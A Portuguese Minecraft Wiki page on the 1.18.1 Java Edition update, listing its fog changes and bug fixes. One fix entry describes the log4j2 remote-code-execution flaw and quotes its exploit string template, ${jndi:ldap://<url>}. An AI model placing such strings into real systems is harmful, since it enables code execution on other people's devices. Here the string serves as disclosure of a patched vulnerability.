Minecraft Wiki
Advertisement
Minecraft 1.18.1
1.18.1 banner.jpg
Java Edition 1.18.1.png
Edição

Edição Java

Data de
lançamento

10 de dezembro de 2021

Versões de desenvolvimento
Downloads

Cliente (.json)
Servidor

Mapas de ofuscação

Cliente
Servidor

Versão do protocolo

757

Versão dos dados

2865

Outras instâncias:
1.18.1

1.18.1 é uma pequena atualização para a Edição Java, lançada em 10 de dezembro de 2021, que faz pequenas mudanças na névoa e corrige erros.[1] Ela é compatível com os servidores da 1.18.

Mudanças

Geral

Névoa
  • A névoa do mundo agora se inicia mais longe do jogador, para fazer com que os terrenos distantes sejam mais visíveis.
  • Ao em vez de ser aplicada como um volume esférico agora é aplicada como um volume cilíndrico.

Correções

7 problemas corrigidos
Das versões lançadas antes da 1.18.1
  • MC-219507 – A potência do sinalizador é revertido de volta ao anterior ao recarregar o mundo.
  • MC-229321 – As abelhas dentro de colmeias/colmeias artificiais às vezes desaparecem quando o mundo é recarregado.
Da versão de desenvolvimento anterior
  • MC-242729 – Observadores sendo ativados sem nenhuma atualização próxima, causado pelo comando /clone.
  • MC-243216 – O alcance visual de chunks em servidores parece menor que na 1.17.1.
  • MC-243796 – Exceções não fatais aleatórias no console:Falha ao armazenar chunk ConcurrentModificationException.
Outros
  • Corrigido um problema que fazia que jogadores em conexões de baixa banda larga obtivessem erros de tempo esgotado ao conectar-se a um servidor.
  • Corrigido um problema de segurança crítico em que os invasores eram capazes de executar códigos em dispositivos de outras pessoas (exploração RCE) por meio de mensagens no jogo ou outros métodos em que o jogo registra uma determinada string explorável formatada como ${jndi:ldap://<url>}, devido a uma vulnerabilidade upstream no log4j2.[2][3]

Referências

Advertisement